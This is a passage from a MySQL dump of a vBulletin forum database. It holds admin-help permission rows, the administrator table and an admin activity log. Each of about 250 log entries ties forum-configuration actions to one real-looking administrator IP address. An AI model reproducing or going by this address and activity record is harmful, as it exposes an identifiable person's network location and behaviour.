'add,edit', 'albummaxsize', 1050, 1, 'vbulletin'), (4895, 'usergroup', 'add,edit', 'canpiccomment', 1055, 1, 'vbulletin'), (4896, 'usergroup', 'add,edit', 'caneditownpiccomment', 1060, 1, 'vbulletin'), (4897, 'usergroup', 'add,edit', 'candeleteownpiccomment', 1065, 1, 'vbulletin'), (4898, 'usergroup', 'add,edit', 'canmanagepiccomment', 1070, 1, 'vbulletin'), (4899, 'usergroup', 'add,edit', 'caneditfontfamily', 1100, 1, 'vbulletin'), (4900, 'usergroup', 'add,edit', 'caneditfontsize', 1110, 1, 'vbulletin'), (4901, 'usergroup', 'add,edit', 'caneditcolors', 1120, 1, 'vbulletin'), (4902, 'usergroup', 'add,edit', 'caneditbgimage', 1130, 1, 'vbulletin'), (4903, 'usergroup', 'add,edit', 'caneditborders', 1140, 1, 'vbulletin'), (4904, 'usergroup', 'add,edit', 'cancreategroups', 1210, 1, 'vbulletin'), (4905, 'usergroup', 'add,edit', 'caneditowngroups', 1220, 1, 'vbulletin'), (4906, 'usergroup', 'add,edit', 'candeleteowngroups', 1230, 1, 'vbulletin'), (4907, 'usergroup', 'add,edit', 'canviewgroups', 1240, 1, 'vbulletin'), (4908, 'usergroup', 'add,edit', 'canmanagemessages', 1250, 1, 'vbulletin'), (4909, 'usergroup', 'add,edit', 'canpostnonmembergroup', 1260, 1, 'vbulletin'), (4910, 'usergroup', 'add,edit', 'canmanageowngroups', 1270, 1, 'vbulletin'), (4911, 'usergroup', 'addleader', '', 1, 1, 'vbulletin'), (4912, 'usergroup', 'addleader', 'usergroupid', 10, 1, 'vbulletin'), (4913, 'usergroup', 'addleader', 'username', 20, 1, 'vbulletin'), (4914, 'usergroup', 'edit', '', 1, 1, 'vbulletin'), (4915, 'usergroup', 'edit,add', 'canalwayscreatediscussion', 1, 1, 'vbulletin'), (4916, 'usergroup', 'edit,add', 'canalwayspostmessage', 1, 1, 'vbulletin'), (4917, 'usergroup', 'edit,add', 'cananimategroupicon', 1, 1, 'vbulletin'), (4918, 'usergroup', 'edit,add', 'cancreatediscussion', 1, 1, 'vbulletin'), (4919, 'usergroup', 'edit,add', 'caneditprivacy', 1, 1, 'vbulletin'), (4921, 'usergroup', 'edit,add', 'cangiveinfraction', 1, 1, 'vbulletin'), (4922, 'usergroup', 'edit,add', 'canlimitdiscussion', 1, 1, 'vbulletin'), (4923, 'usergroup', 'edit,add', 'canmanagediscussions', 1, 1, 'vbulletin'), (4924, 'usergroup', 'edit,add', 'canpostmessage', 1, 1, 'vbulletin'), (4925, 'usergroup', 'edit,add', 'canreverseinfraction', 1, 1, 'vbulletin'), (4926, 'usergroup', 'edit,add', 'canseeinfraction', 1, 1, 'vbulletin'), (4927, 'usergroup', 'edit,add', 'canseethumbnails', 1, 1, 'vbulletin'), (4928, 'usergroup', 'edit,add', 'canuploadgroupicon', 1, 1, 'vbulletin'), (4929, 'usergroup', 'edit,add', 'groupiconmaxsize', 1, 1, 'vbulletin'), (4930, 'usergroup', 'edit,add', 'maximumsocialgroups', 1, 1, 'vbulletin'), (4931, 'usergroup', 'edit,add', 'pmthrottlequantity', 1, 1, 'vbulletin'), (4932, 'usergroup', 'edit,add', 'requirehvcheck', 1, 1, 'vbulletin'), (4933, 'usergroup', 'edit,add', 'canmanageownprofile', 900, 1, 'vbulletin'), (4934, 'usergroup', 'edit,add', 'canmessageownprofile', 910, 1, 'vbulletin'), (4935, 'usergroup', 'edit,add', 'canmessageothersprofile', 920, 1, 'vbulletin'), (4936, 'usergroup', 'edit,add', 'caneditownmessages', 930, 1, 'vbulletin'), (4937, 'usergroup', 'modify', '', 1, 1, 'vbulletin'), (4938, 'usergroup', 'modifypromotion', '', 1, 1, 'vbulletin'), (4939, 'usergroup', 'remove', '', 1, 1, 'vbulletin'), (4940, 'usergroup', 'removeleader', '', 1, 1, 'vbulletin'), (4941, 'usergroup', 'removepromotion', '', 1, 1, 'vbulletin'), (4942, 'usergroup', 'updatepromotion', '', 1, 1, 'vbulletin'), (4943, 'usergroup', 'updatepromotion', 'usergroupid', 5, 1, 'vbulletin'), (4944, 'usergroup', 'updatepromotion', 'reputationtype', 10, 1, 'vbulletin'), (4945, 'usergroup', 'updatepromotion', 'reputation', 20, 1, 'vbulletin'), (4946, 'usergroup', 'updatepromotion', 'date', 30, 1, 'vbulletin'), (4947, 'usergroup', 'updatepromotion', 'posts', 40, 1, 'vbulletin'), (4948, 'usergroup', 'updatepromotion', 'strategy', 50, 1, 'vbulletin'), (4949, 'usergroup', 'updatepromotion', 'type', 60, 1, 'vbulletin'), (4950, 'usergroup', 'updatepromotion', 'joinusergroupid', 70, 1, 'vbulletin'), (4951, 'usergroup', 'viewjoinrequests', '', 1, 1, 'vbulletin'), (4952, 'usertitle', '', '', 1, 1, 'vbulletin'), (4953, 'usertitle', 'add', '', 1, 1, 'vbulletin'), (4954, 'usertitle', 'add,edit', 'title', 10, 1, 'vbulletin'), (4955, 'usertitle', 'add,edit', 'minposts', 20, 1, 'vbulletin'), (4956, 'usertitle', 'edit', '', 1, 1, 'vbulletin'), (4957, 'usertitle', 'modify', '', 1, 1, 'vbulletin'), (4958, 'usertitle', 'remove', '', 1, 1, 'vbulletin'), (4959, 'usertools', '', '', 1, 1, 'vbulletin'), (4960, 'usertools', 'doips', '', 1, 1, 'vbulletin'), (4961, 'usertools', 'doips', 'ipaddress', 20, 1, 'vbulletin'), (4962, 'usertools', 'doips', 'username', 30, 1, 'vbulletin'), (4963, 'usertools', 'doips', 'depth', 40, 1, 'vbulletin'), (4964, 'usertools', 'domerge', '', 1, 1, 'vbulletin'), (4965, 'usertools', 'gethost', '', 1, 1, 'vbulletin'), (4966, 'usertools', 'merge', '', 1, 1, 'vbulletin'), (4967, 'usertools', 'merge', 'sourceuser', 10, 1, 'vbulletin'), (4968, 'usertools', 'merge', 'destuser', 20, 1, 'vbulletin'), (4969, 'usertools', 'pmfolderstats', '', 1, 1, 'vbulletin'), (4970, 'usertools', 'pmstats', '', 1, 1, 'vbulletin'), (4971, 'usertools', 'pmuserstats', '', 1, 1, 'vbulletin'), (4972, 'usertools', 'referrers', '', 1, 1, 'vbulletin'), (4973, 'usertools', 'referrers', 'startdate', 10, 1, 'vbulletin'), (4974, 'usertools', 'referrers', 'enddate', 20, 1, 'vbulletin'), (4975, 'usertools', 'removepms', '', 1, 1, 'vbulletin'), (4976, 'usertools', 'removesentpms', '', 1, 1, 'vbulletin'), (4977, 'usertools', 'removesubs', '', 1, 1, 'vbulletin'), (4978, 'usertools', 'showreferrals', '', 1, 1, 'vbulletin'), (4979, 'usertools', 'showreferrers', '', 1, 1, 'vbulletin'), (4980, 'verify', 'intro', '', 1, 1, 'vbulletin'), (4981, 'verify', 'intro', 'hv_recaptcha_privatekey', 1, 1, 'vbulletin'), (4982, 'verify', 'intro', 'hv_recaptcha_publickey', 1, 1, 'vbulletin'), (4983, 'verify', 'intro', 'hv_recaptcha_theme', 1, 1, 'vbulletin'), (4984, 'verify', 'intro', 'hv_type', 1, 1, 'vbulletin'), (4985, 'verify', 'intro', 'regimagetype', 1, 1, 'vbulletin'), (4986, 'verify', 'intro', 'regimageoption', 2, 1, 'vbulletin'), (4987, 'verify', 'modifyanswer', 'answer', 1, 1, 'vbulletin'), (4988, 'verify', 'modifyquestion', 'question', 1, 1, 'vbulletin'), (4989, 'verify', 'modifyquestion', 'regex', 1, 1, 'vbulletin'); DROP TABLE IF EXISTS `administrator`; CREATE TABLE `administrator` ( `userid` int(10) unsigned NOT NULL DEFAULT '0', `adminpermissions` int(10) unsigned NOT NULL DEFAULT '0', `navprefs` mediumtext, `cssprefs` varchar(250) NOT NULL DEFAULT '', `notes` mediumtext, `dismissednews` text, `languageid` smallint(5) unsigned NOT NULL DEFAULT '0', PRIMARY KEY (`userid`) ) ENGINE=InnoDB DEFAULT CHARSET=latin1; INSERT INTO `administrator` (`userid`, `adminpermissions`, `navprefs`, `cssprefs`, `notes`, `dismissednews`, `languageid`) VALUES (1, 491516, NULL, '', NULL, NULL, 0), (388, 491516, NULL, '', NULL, '', 0); DROP TABLE IF EXISTS `adminlog`; CREATE TABLE `adminlog` ( `adminlogid` int(10) unsigned NOT NULL AUTO_INCREMENT, `userid` int(10) unsigned NOT NULL DEFAULT '0', `dateline` int(10) unsigned NOT NULL DEFAULT '0', `script` varchar(50) NOT NULL DEFAULT '', `action` varchar(20) NOT NULL DEFAULT '', `extrainfo` varchar(200) NOT NULL DEFAULT '', `ipaddress` char(15) NOT NULL DEFAULT '', PRIMARY KEY (`adminlogid`), KEY `script_action` (`script`,`action`) ) ENGINE=InnoDB DEFAULT CHARSET=latin1; INSERT INTO `adminlog` (`adminlogid`, `userid`, `dateline`, `script`, `action`, `extrainfo`, `ipaddress`) VALUES (1, 1, 1420392581, 'options.php', '', '', '46.146.211.11'), (2, 1, 1420392583, 'options.php', 'options', '', '46.146.211.11'), (3, 1, 1420392590, 'options.php', 'dooptions', '', '46.146.211.11'), (4, 1, 1420392592, 'options.php', 'options', '', '46.146.211.11'), (5, 1, 1420392867, 'options.php', 'dooptions', '', '46.146.211.11'), (6, 1, 1420392869, 'options.php', 'options', '', '46.146.211.11'), (7, 1, 1420392873, 'options.php', 'dooptions', '', '46.146.211.11'), (8, 1, 1420392874, 'options.php', 'options', '', '46.146.211.11'), (9, 1, 1420393310, 'forum.php', 'modify', '', '46.146.211.11'), (10, 1, 1420393315, 'forum.php', 'edit', 'forum id = 1', '46.146.211.11'), (11, 1, 1420393328, 'forum.php', 'update', 'forum id = 1', '46.146.211.11'), (12, 1, 1420393329, 'forum.php', 'modify', 'forum id = 1', '46.146.211.11'), (13, 1, 1420393332, 'forum.php', 'edit', 'forum id = 2', '46.146.211.11'), (14, 1, 1420393340, 'forum.php', 'update', 'forum id = 2', '46.146.211.11'), (15, 1, 1420393342, 'forum.php', 'modify', 'forum id = 2', '46.146.211.11'), (16, 1, 1420393348, 'forum.php', 'add', '', '46.146.211.11'), (17, 1, 1420393380, 'forum.php', 'modify', 'forum id = 2', '46.146.211.11'), (18, 1, 1420393382, 'forum.php', 'add', '', '46.146.211.11'), (19, 1, 1420393386, 'forum.php', 'update', '', '46.146.211.11'), (20, 1, 1420393388, 'forum.php', 'modify', 'forum id = 3', '46.146.211.11'), (21, 1, 1420393392, 'forum.php', 'edit', 'forum id = 3', '46.146.211.11'), (22, 1, 1420393409, 'forum.php', 'update', 'forum id = 3', '46.146.211.11'), (23, 1, 1420393413, 'forum.php', 'modify', 'forum id = 3', '46.146.211.11'), (24, 1, 1420393418, 'forum.php', 'add', '', '46.146.211.11'), (25, 1, 1420393422, 'forum.php', 'update', '', '46.146.211.11'), (26, 1, 1420393423, 'forum.php', 'modify', 'forum id = 4', '46.146.211.11'), (27, 1, 1420393427, 'forum.php', 'add', '', '46.146.211.11'), (28, 1, 1420393436, 'forum.php', 'update', '', '46.146.211.11'), (29, 1, 1420393437, 'forum.php', 'modify', 'forum id = 5', '46.146.211.11'), (30, 1, 1420393447, 'forum.php', 'add', '', '46.146.211.11'), (31, 1, 1420393451, 'forum.php', 'update', '', '46.146.211.11'), (32, 1, 1420393453, 'forum.php', 'modify', 'forum id = 6', '46.146.211.11'), (33, 1, 1420393472, 'forum.php', 'add', '', '46.146.211.11'), (34, 1, 1420393476, 'forum.php', 'update', '', '46.146.211.11'), (35, 1, 1420393477, 'forum.php', 'modify', 'forum id = 7', '46.146.211.11'), (36, 1, 1420393497, 'forum.php', 'edit', 'forum id = 3', '46.146.211.11'), (37, 1, 1420393515, 'forum.php', 'update', 'forum id = 3', '46.146.211.11'), (38, 1, 1420393520, 'forum.php', 'modify', 'forum id = 3', '46.146.211.11'), (39, 1, 1420393534, 'forum.php', 'edit', 'forum id = 3', '46.146.211.11'), (40, 1, 1420393580, 'forum.php', 'modify', 'forum id = 3', '46.146.211.11'), (41, 1, 1420393592, 'forum.php', 'edit', 'forum id = 1', '46.146.211.11'), (42, 1, 1420393624, 'forum.php', 'add', '', '46.146.211.11'), (43, 1, 1420393630, 'forum.php', 'update', '', '46.146.211.11'), (44, 1, 1420393631, 'forum.php', 'modify', 'forum id = 8', '46.146.211.11'), (45, 1, 1420393636, 'forum.php', 'add', '', '46.146.211.11'), (46, 1, 1420393645, 'forum.php', 'update', '', '46.146.211.11'), (47, 1, 1420393646, 'forum.php', 'modify', 'forum id = 9', '46.146.211.11'), (48, 1, 1420393655, 'forum.php', 'add', '', '46.146.211.11'), (49, 1, 1420393658, 'forum.php', 'update', '', '46.146.211.11'), (50, 1, 1420393659, 'forum.php', 'modify', 'forum id = 10', '46.146.211.11'), (51, 1, 1420393671, 'forum.php', 'add', '', '46.146.211.11'), (52, 1, 1420393674, 'forum.php', 'update', '', '46.146.211.11'), (53, 1, 1420393677, 'forum.php', 'modify', 'forum id = 11', '46.146.211.11'), (54, 1, 1420393681, 'forum.php', 'add', '', '46.146.211.11'), (55, 1, 1420393685, 'forum.php', 'modify', 'forum id = 11', '46.146.211.11'), (56, 1, 1420393692, 'forum.php', 'add', '', '46.146.211.11'), (57, 1, 1420393695, 'forum.php', 'update', '', '46.146.211.11'), (58, 1, 1420393697, 'forum.php', 'modify', 'forum id = 12', '46.146.211.11'), (59, 1, 1420393704, 'forum.php', 'add', '', '46.146.211.11'), (60, 1, 1420393715, 'forum.php', 'modify', 'forum id = 12', '46.146.211.11'), (61, 1, 1420393718, 'forum.php', 'add', '', '46.146.211.11'), (62, 1, 1420393744, 'forum.php', 'modify', '', '46.146.211.11'), (63, 1, 1420393746, 'forum.php', 'add', '', '46.146.211.11'), (64, 1, 1420393752, 'forum.php', 'update', '', '46.146.211.11'), (65, 1, 1420393753, 'forum.php', 'modify', 'forum id = 13', '46.146.211.11'), (66, 1, 1420393758, 'forum.php', 'add', '', '46.146.211.11'), (67, 1, 1420393763, 'forum.php', 'update', '', '46.146.211.11'), (68, 1, 1420393765, 'forum.php', 'modify', 'forum id = 14', '46.146.211.11'), (69, 1, 1420393779, 'forum.php', 'add', '', '46.146.211.11'), (70, 1, 1420393786, 'forum.php', 'update', '', '46.146.211.11'), (71, 1, 1420393787, 'forum.php', 'modify', 'forum id = 15', '46.146.211.11'), (72, 1, 1420393795, 'forum.php', 'edit', 'forum id = 3', '46.146.211.11'), (73, 1, 1420393813, 'forum.php', 'update', 'forum id = 3', '46.146.211.11'), (74, 1, 1420393817, 'forum.php', 'modify', 'forum id = 3', '46.146.211.11'), (75, 1, 1420393820, 'forum.php', 'edit', 'forum id = 6', '46.146.211.11'), (76, 1, 1420393828, 'forum.php', 'update', 'forum id = 6', '46.146.211.11'), (77, 1, 1420393831, 'forum.php', 'modify', 'forum id = 6', '46.146.211.11'), (78, 1, 1420393836, 'forum.php', 'edit', 'forum id = 8', '46.146.211.11'), (79, 1, 1420393846, 'forum.php', 'update', 'forum id = 8', '46.146.211.11'), (80, 1, 1420393848, 'forum.php', 'modify', 'forum id = 8', '46.146.211.11'), (81, 1, 1420393854, 'forum.php', 'edit', 'forum id = 10', '46.146.211.11'), (82, 1, 1420393859, 'forum.php', 'update', 'forum id = 10', '46.146.211.11'), (83, 1, 1420393860, 'forum.php', 'modify', 'forum id = 10', '46.146.211.11'), (84, 1, 1420393868, 'forum.php', 'edit', 'forum id = 13', '46.146.211.11'), (85, 1, 1420393873, 'forum.php', 'update', 'forum id = 13', '46.146.211.11'), (86, 1, 1420393874, 'forum.php', 'modify', 'forum id = 13', '46.146.211.11'), (87, 1, 1420394080, 'forum.php', 'doorder', '', '46.146.211.11'), (88, 1, 1420394082, 'forum.php', 'modify', '', '46.146.211.11'), (89, 1, 1420394099, 'forumpermission.php', 'modify', '', '46.146.211.11'), (90, 1, 1420394105, 'forumpermission.php', 'quickset', 'forum id = 1', '46.146.211.11'), (91, 1, 1420394107, 'forumpermission.php', 'modify', 'forum id = 1', '46.146.211.11'), (92, 1, 1420394111, 'forumpermission.php', 'quickset', 'forum id = 3', '46.146.211.11'), (93, 1, 1420394112, 'forumpermission.php', 'modify', 'forum id = 3', '46.146.211.11'), (94, 1, 1420394114, 'forumpermission.php', 'quickset', 'forum id = 6', '46.146.211.11'), (95, 1, 1420394116, 'forumpermission.php', 'modify', 'forum id = 6', '46.146.211.11'), (96, 1, 1420394118, 'forumpermission.php', 'quickset', 'forum id = 8', '46.146.211.11'), (97, 1, 1420394119, 'forumpermission.php', 'modify', 'forum id = 8', '46.146.211.11'), (98, 1, 1420394123, 'forumpermission.php', 'quickset', 'forum id = 10', '46.146.211.11'), (99, 1, 1420394124, 'forumpermission.php', 'modify', 'forum id = 10', '46.146.211.11'), (100, 1, 1420394127, 'forumpermission.php', 'quickset', 'forum id = 13', '46.146.211.11'), (101, 1, 1420394128, 'forumpermission.php', 'modify', 'forum id = 13', '46.146.211.11'), (102, 1, 1420394138, 'forumpermission.php', 'edit', 'forumpermission id = 6', '46.146.211.11'), (103, 1, 1420394152, 'forumpermission.php', 'doupdate', '', '46.146.211.11'), (104, 1, 1420394153, 'forumpermission.php', 'modify', 'forum id = 1', '46.146.211.11'), (105, 1, 1420394156, 'forumpermission.php', 'edit', 'forumpermission id = 6', '46.146.211.11'), (106, 1, 1420394161, 'forumpermission.php', 'doupdate', '', '46.146.211.11'), (107, 1, 1420394165, 'forumpermission.php', 'modify', 'forum id = 1', '46.146.211.11'), (108, 1, 1420394194, 'forumpermission.php', 'modify', '', '46.146.211.11'), (109, 1, 1420394201, 'forumpermission.php', 'edit', 'forumpermission id = 7', '46.146.211.11'), (110, 1, 1420394205, 'forumpermission.php', 'doupdate', '', '46.146.211.11'), (111, 1, 1420394206, 'forumpermission.php', 'modify', 'forum id = 1', '46.146.211.11'), (112, 1, 1420394210, 'forumpermission.php', 'edit', 'forumpermission id = 2', '46.146.211.11'), (113, 1, 1420394213, 'forumpermission.php', 'doupdate', '', '46.146.211.11'), (114, 1, 1420394214, 'forumpermission.php', 'modify', 'forum id = 1', '46.146.211.11'), (115, 1, 1420394217, 'forumpermission.php', 'edit', 'forumpermission id = 5', '46.146.211.11'), (116, 1, 1420394221, 'forumpermission.php', 'doupdate', '', '46.146.211.11'), (117, 1, 1420394222, 'forumpermission.php', 'modify', 'forum id = 1', '46.146.211.11'), (118, 1, 1420394234, 'forumpermission.php', 'edit', 'forumpermission id = 14', '46.146.211.11'), (119, 1, 1420394237, 'forumpermission.php', 'doupdate', '', '46.146.211.11'), (120, 1, 1420394238, 'forumpermission.php', 'modify', 'forum id = 3', '46.146.211.11'), (121, 1, 1420394242, 'forumpermission.php', 'edit', 'forumpermission id = 15', '46.146.211.11'), (122, 1, 1420394245, 'forumpermission.php', 'doupdate', '', '46.146.211.11'), (123, 1, 1420394246, 'forumpermission.php', 'modify', 'forum id = 3', '46.146.211.11'), (124, 1, 1420394248, 'forumpermission.php', 'edit', 'forumpermission id = 10', '46.146.211.11'), (125, 1, 1420394251, 'forumpermission.php', 'doupdate', '', '46.146.211.11'), (126, 1, 1420394252, 'forumpermission.php', 'modify', 'forum id = 3', '46.146.211.11'), (127, 1, 1420394255, 'forumpermission.php', 'edit', 'forumpermission id = 13', '46.146.211.11'), (128, 1, 1420394257, 'forumpermission.php', 'doupdate', '', '46.146.211.11'), (129, 1, 1420394258, 'forumpermission.php', 'modify', 'forum id = 3', '46.146.211.11'), (130, 1, 1420394267, 'forumpermission.php', 'edit', 'forumpermission id = 22', '46.146.211.11'), (131, 1, 1420394270, 'forumpermission.php', 'doupdate', '', '46.146.211.11'), (132, 1, 1420394271, 'forumpermission.php', 'modify', 'forum id = 6', '46.146.211.11'), (133, 1, 1420394277, 'forumpermission.php', 'edit', 'forumpermission id = 18', '46.146.211.11'), (134, 1, 1420394279, 'forumpermission.php', 'doupdate', '', '46.146.211.11'), (135, 1, 1420394280, 'forumpermission.php', 'modify', 'forum id = 6', '46.146.211.11'), (136, 1, 1420394285, 'forumpermission.php', 'edit', 'forumpermission id = 21', '46.146.211.11'), (137, 1, 1420394287, 'forumpermission.php', 'doupdate', '', '46.146.211.11'), (138, 1, 1420394288, 'forumpermission.php', 'modify', 'forum id = 6', '46.146.211.11'), (139, 1, 1420394294, 'forumpermission.php', 'edit', 'forumpermission id = 23', '46.146.211.11'), (140, 1, 1420394297, 'forumpermission.php', 'doupdate', '', '46.146.211.11'), (141, 1, 1420394298, 'forumpermission.php', 'modify', 'forum id = 6', '46.146.211.11'), (142, 1, 1420394309, 'forumpermission.php', 'edit', 'forumpermission id = 30', '46.146.211.11'), (143, 1, 1420394312, 'forumpermission.php', 'doupdate', '', '46.146.211.11'), (144, 1, 1420394313, 'forumpermission.php', 'modify', 'forum id = 8', '46.146.211.11'), (145, 1, 1420394318, 'forumpermission.php', 'edit', 'forumpermission id = 31', '46.146.211.11'), (146, 1, 1420394321, 'forumpermission.php', 'doupdate', '', '46.146.211.11'), (147, 1, 1420394322, 'forumpermission.php', 'modify', 'forum id = 8', '46.146.211.11'), (148, 1, 1420394325, 'forumpermission.php', 'edit', 'forumpermission id = 26', '46.146.211.11'), (149, 1, 1420394327, 'forumpermission.php', 'doupdate', '', '46.146.211.11'), (150, 1, 1420394328, 'forumpermission.php', 'modify', 'forum id = 8', '46.146.211.11'), (151, 1, 1420394331, 'forumpermission.php', 'edit', 'forumpermission id = 29', '46.146.211.11'), (152, 1, 1420394334, 'forumpermission.php', 'doupdate', '', '46.146.211.11'), (153, 1, 1420394338, 'forumpermission.php', 'modify', 'forum id = 8', '46.146.211.11'), (154, 1, 1420394343, 'forumpermission.php', 'edit', 'forumpermission id = 38', '46.146.211.11'), (155, 1, 1420394346, 'forumpermission.php', 'doupdate', '', '46.146.211.11'), (156, 1, 1420394347, 'forumpermission.php', 'modify', 'forum id = 10', '46.146.211.11'), (157, 1, 1420394350, 'forumpermission.php', 'edit', 'forumpermission id = 39', '46.146.211.11'), (158, 1, 1420394353, 'forumpermission.php', 'doupdate', '', '46.146.211.11'), (159, 1, 1420394354, 'forumpermission.php', 'modify', 'forum id = 10', '46.146.211.11'), (160, 1, 1420394358, 'forumpermission.php', 'edit', 'forumpermission id = 34', '46.146.211.11'), (161, 1, 1420394360, 'forumpermission.php', 'doupdate', '', '46.146.211.11'), (162, 1, 1420394361, 'forumpermission.php', 'modify', 'forum id = 10', '46.146.211.11'), (163, 1, 1420394364, 'forumpermission.php', 'edit', 'forumpermission id = 37', '46.146.211.11'), (164, 1, 1420394367, 'forumpermission.php', 'doupdate', '', '46.146.211.11'), (165, 1, 1420394368, 'forumpermission.php', 'modify', 'forum id = 10', '46.146.211.11'), (166, 1, 1420394371, 'forumpermission.php', 'edit', 'forumpermission id = 46', '46.146.211.11'), (167, 1, 1420394374, 'forumpermission.php', 'doupdate', '', '46.146.211.11'), (168, 1, 1420394375, 'forumpermission.php', 'modify', 'forum id = 13', '46.146.211.11'), (169, 1, 1420394378, 'forumpermission.php', 'edit', 'forumpermission id = 47', '46.146.211.11'), (170, 1, 1420394381, 'forumpermission.php', 'doupdate', '', '46.146.211.11'), (171, 1, 1420394382, 'forumpermission.php', 'modify', 'forum id = 13', '46.146.211.11'), (172, 1, 1420394384, 'forumpermission.php', 'edit', 'forumpermission id = 42', '46.146.211.11'), (173, 1, 1420394387, 'forumpermission.php', 'doupdate', '', '46.146.211.11'), (174, 1, 1420394388, 'forumpermission.php', 'modify', 'forum id = 13', '46.146.211.11'), (175, 1, 1420394390, 'forumpermission.php', 'edit', 'forumpermission id = 45', '46.146.211.11'), (176, 1, 1420394392, 'forumpermission.php', 'doupdate', '', '46.146.211.11'), (177, 1, 1420394395, 'forumpermission.php', 'modify', 'forum id = 13', '46.146.211.11'), (178, 1, 1420394985, 'thread.php', 'prune', '', '46.146.211.11'), (179, 1, 1420395387, 'user.php', 'add', '', '46.146.211.11'), (180, 1, 1420395450, 'user.php', 'update', '', '46.146.211.11'), (181, 1, 1420395451, 'user.php', 'modify', 'user id = 101', '46.146.211.11'), (182, 1, 1420395577, 'forum.php', 'modify', '', '46.146.211.11'), (183, 1, 1420395730, 'forum.php', 'doorder', '', '46.146.211.11'), (184, 1, 1420395734, 'forum.php', 'modify', '', '46.146.211.11'), (185, 1, 1420395875, 'language.php', 'files', '', '46.146.211.11'), (186, 1, 1420395924, 'language.php', 'upload', '', '46.146.211.11'), (187, 1, 1420395925, 'language.php', 'rebuild', '', '46.146.211.11'), (188, 1, 1420395933, 'language.php', '', '', '46.146.211.11'), (189, 1, 1420395985, 'language.php', 'edit_settings', 'Language ID = 2', '46.146.211.11'), (190, 1, 1420395990, 'language.php', 'update_settings', 'Language ID = 2', '46.146.211.11'), (191, 1, 1420395994, 'language.php', 'setdefault', 'Language ID = 2', '46.146.211.11'), (192, 1, 1420396027, 'language.php', 'edit_settings', 'Language ID = 1', '46.146.211.11'), (193, 1, 1420396030, 'language.php', 'update_settings', 'Language ID = 1', '46.146.211.11'), (194, 1, 1420396031, 'language.php', 'setdefault', 'Language ID = 1', '46.146.211.11'), (195, 1, 1420396288, 'forum.php', 'modify', '', '46.146.211.11'), (196, 1, 1420396291, 'forum.php', 'edit', 'forum id = 1', '46.146.211.11'), (197, 1, 1420396292, 'forum.php', 'modify', '', '46.146.211.11'), (198, 1, 1420396294, 'forum.php', 'edit', 'forum id = 2', '46.146.211.11'), (199, 1, 1420396298, 'forum.php', 'update', 'forum id = 2', '46.146.211.11'), (200, 1, 1420396299, 'forum.php', 'modify', 'forum id = 2', '46.146.211.11'), (201, 1, 1420396301, 'forum.php', 'edit', 'forum id = 4', '46.146.211.11'), (202, 1, 1420396305, 'forum.php', 'update', 'forum id = 4', '46.146.211.11'), (203, 1, 1420396309, 'forum.php', 'modify', 'forum id = 4', '46.146.211.11'), (204, 1, 1420396336, 'forum.php', 'edit', 'forum id = 7', '46.146.211.11'), (205, 1, 1420396339, 'forum.php', 'update', 'forum id = 7', '46.146.211.11'), (206, 1, 1420396340, 'forum.php', 'modify', 'forum id = 7', '46.146.211.11'), (207, 1, 1420396342, 'forum.php', 'edit', 'forum id = 22', '46.146.211.11'), (208, 1, 1420396344, 'forum.php', 'modify', 'forum id = 7', '46.146.211.11'), (209, 1, 1420396347, 'forum.php', 'edit', 'forum id = 23', '46.146.211.11'), (210, 1, 1420396361, 'forum.php', 'edit', 'forum id = 22', '46.146.211.11'), (211, 1, 1420396364, 'forum.php', 'update', 'forum id = 22', '46.146.211.11'), (212, 1, 1420396367, 'forum.php', 'modify', 'forum id = 22', '46.146.211.11'), (213, 1, 1420396482, 'forum.php', 'edit', 'forum id = 19', '46.146.211.11'), (214, 1, 1420396486, 'forum.php', 'update', 'forum id = 19', '46.146.211.11'), (215, 1, 1420396487, 'forum.php', 'modify', 'forum id = 19', '46.146.211.11'), (216, 1, 1420396511, 'forumpermission.php', 'modify', '', '46.146.211.11'), (217, 1, 1420396530, 'forumpermission.php', 'quickset', 'forum id = 19', '46.146.211.11'), (218, 1, 1420396532, 'forumpermission.php', 'quickset', 'forum id = 19', '46.146.211.11'), (219, 1, 1420396534, 'forum.php', 'modify', '', '46.146.211.11'), (220, 1, 1420396540, 'forumpermission.php', 'modify', '', '46.146.211.11'), (221, 1, 1420396541, 'forumpermission.php', 'quickset', 'forum id = 19', '46.146.211.11'), (222, 1, 1420396542, 'forumpermission.php', 'modify', 'forum id = 19', '46.146.211.11'), (223, 1, 1420396545, 'forumpermission.php', 'quickset', 'forum id = 1', '46.146.211.11'), (224, 1, 1420396546, 'forumpermission.php', 'modify', 'forum id = 1', '46.146.211.11'), (225, 1, 1420396548, 'forumpermission.php', 'quickset', 'forum id = 1', '46.146.211.11'), (226, 1, 1420396549, 'forumpermission.php', 'modify', 'forum id = 1', '46.146.211.11'), (227, 1, 1420396553, 'forumpermission.php', 'quickset', 'forum id = 17', '46.146.211.11'), (228, 1, 1420396554, 'forumpermission.php', 'modify', 'forum id = 17', '46.146.211.11'), (229, 1, 1420396557, 'forumpermission.php', 'quickset', 'forum id = 6', '46.146.211.11'), (230, 1, 1420396558, 'forumpermission.php', 'modify', 'forum id = 6', '46.146.211.11'), (231, 1, 1420396561, 'forumpermission.php', 'quickset', 'forum id = 11', '46.146.211.11'), (232, 1, 1420396562, 'forumpermission.php', 'modify', 'forum id = 11', '46.146.211.11'), (233, 1, 1420396565, 'forumpermission.php', 'quickset', 'forum id = 14', '46.146.211.11'), (234, 1, 1420396566, 'forumpermission.php', 'modify', 'forum id = 14', '46.146.211.11'), (235, 1, 1420396570, 'forumpermission.php', 'quickset', 'forum id = 14', '46.146.211.11'), (236, 1, 1420396572, 'forumpermission.php', 'modify', 'forum id = 14', '46.146.211.11'), (237, 1, 1420396603, 'forumpermission.php', 'edit', 'forumpermission id = 50', '46.146.211.11'), (238, 1, 1420396606, 'forumpermission.php', 'doupdate', '', '46.146.211.11'), (239, 1, 1420396607, 'forumpermission.php', 'modify', 'forum id = 19', '46.146.211.11'), (240, 1, 1420396611, 'forumpermission.php', 'edit', 'forumpermission id = 55', '46.146.211.11'), (241, 1, 1420396613, 'forumpermission.php', 'doupdate', '', '46.146.211.11'), (242, 1, 1420396614, 'forumpermission.php', 'modify', 'forum id = 19', '46.146.211.11'), (243, 1, 1420396618, 'forumpermission.php', 'edit', 'forumpermission id = 54', '46.146.211.11'), (244, 1, 1420396620, 'forumpermission.php', 'doupdate', '', '46.146.211.11'), (245, 1, 1420396621, 'forumpermission.php', 'modify', 'forum id = 19', '46.146.211.11'), (246, 1, 1420396624, 'forumpermission.php', 'edit', 'forumpermission id = 53', '46.146.211.11'), (247, 1, 1420396627, 'forumpermission.php', 'doupdate', '', '46.146.211.11'), (248, 1, 1420396630, 'forumpermission.php', 'modify', 'forum id = 19', '46.146.211.11'), (249, 1, 1420396634, 'forumpermission.php', 'edit', 'forumpermission id = 54', '46.146.211.11'), 